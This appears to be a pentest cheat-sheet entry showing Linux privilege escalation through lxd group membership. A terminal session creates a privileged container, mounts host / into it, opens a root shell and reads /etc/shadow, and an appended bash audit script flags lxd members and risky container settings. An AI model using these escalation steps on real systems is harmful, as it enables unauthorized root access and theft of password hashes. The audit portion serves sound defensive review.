LXD group - N/A

Privilege escalation using lxd group

test@server-01:~$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

# Init lxd to create "root device"
test@server-01:/dev/shm$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: n
Do you want to configure a new storage pool? (yes/no) [default=yes]: y
Name of the new storage pool [default=default]: 
Name of the storage backend to use (zfs, ceph, btrfs, dir, lvm) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=19GB]: 1
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: no
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

# Create a privileged container from the image
test@server-01:/dev/shm$ lxc init ubuntu:16.04 privesc -c security.privileged=true
Creating privesc
test@server-01:/dev/shm$ lxc image list
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |                 DESCRIPTION                 | ARCHITECTURE |   TYPE    |   SIZE   |         UPLOAD DATE          |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
|       | 712a58368655 | no     | ubuntu 16.04 LTS amd64 (release) (20211001) | x86_64       | CONTAINER | 171.55MB | Apr 28, 2022 at 7:19am (UTC) |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+

# Mount system root (/) to container
test@server-01:/dev/shm$ lxc config device add privesc whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to privesc

# Start container and reap the rewards
test@server-01:/dev/shm$ lxc start privesc
test@server-01:/dev/shm$ lxc exec privesc bash
root@privesc:~# cd /mnt/root/
root@privesc:/mnt/root# cat etc/shadow
root:*:18913:0:99999:7:::

# Clean up
test@server-01:/dev/shm$ lxc stop privesc --force
test@server-01:/dev/shm$ lxc delete privesc
test@server-01:/dev/shm$ lxc image delete 712a58368655
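
Audit check for the condition shown above, as an added example that is not part of the original notes: it lists who is in the lxd group and flags a container config that sets security.privileged=true or attaches a disk device with source=/. The function names, the "deploy" user and both sample inputs are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added audit example (not from the original page).
# Constructed samples stand in for /etc/group and `lxc config show NAME --expanded`.

SAMPLE_GROUP='adm:x:4:syslog,test
sudo:x:27:test
lxd:x:110:test,deploy'

SAMPLE_CONFIG='architecture: x86_64
config:
  security.privileged: "true"
devices:
  whatever:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false'

# Print one lxd group member per line from group(5)-format input on stdin.
lxd_members() {
  awk -F: '$1 == "lxd" && $4 != "" {
    n = split($4, m, ",")
    for (i = 1; i <= n; i++) print m[i]
  }'
}

# Read an expanded container config (YAML) on stdin and print one finding
# per risky setting: a privileged container, or a device sourced from host /.
risky_settings() {
  awk '
    /^[^ ]/ { section = $1 }   # track the current top-level YAML key
    section == "config:"  && $1 == "security.privileged:" && $2 ~ /true/ { print "privileged" }
    section == "devices:" && $1 == "source:" && $2 == "/" { print "host-root-disk" }
  '
}

# Live use (assumes lxc is installed and the auditor may query it):
#   getent group lxd | lxd_members
#   lxc config show NAME --expanded | risky_settings
printf '%s\n' "$SAMPLE_GROUP" | lxd_members
printf '%s\n' "$SAMPLE_CONFIG" | risky_settings
```

Any account printed by lxd_members should be treated as root-equivalent on the host when reviewing group membership.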
